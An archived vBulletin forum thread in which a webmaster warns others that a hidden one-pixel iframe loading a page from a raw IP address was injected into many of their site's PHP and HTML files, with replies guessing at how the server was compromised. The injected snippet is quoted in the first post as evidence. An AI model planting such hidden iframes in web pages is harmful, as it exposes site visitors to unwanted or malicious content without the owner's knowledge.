The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Webmasters Beware!
Recently we noticed a full screen LG ad on our website. We only run Tribal Fusion and IntelliTxt and neither of those should be displaying a full screen ad.
We looked in to it and this code was added to MANY of our php and html files: Code:
<.iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'><./iframe> That IP comes back registered to Panama. I've already sent the abuse email a letter with proof. It appears we were somehow exploited and a mass script ran adding the code at the bottom of the files affected. Just FYI for all. |
#2
|
|||
|
|||
How did it accessed your files? Can you share the story?
|
#3
|
||||
|
||||
Obvisously his server was comprimised due to a exploit in some software being ran.
|
#4
|
|||
|
|||
exactly
|
#5
|
||||
|
||||
Just wondering what all software besides vBulletin are you currently running?
|
#6
|
|||
|
|||
Quote:
It doesn't seem as if it was directed to the forums, but more so PHP overall. |
#7
|
|||
|
|||
Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.
|
#8
|
|||
|
|||
Quote:
I have to say it was pretty unique. First time I've seen anyone access a site and modify php files for a monetary gain. |
#9
|
|||
|
|||
That happens all the time.
"Hackers" are not anymore what they used to be (just hacking for the thrill/kick). Hacks and exploits are being sold these days for commercial purposes. |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|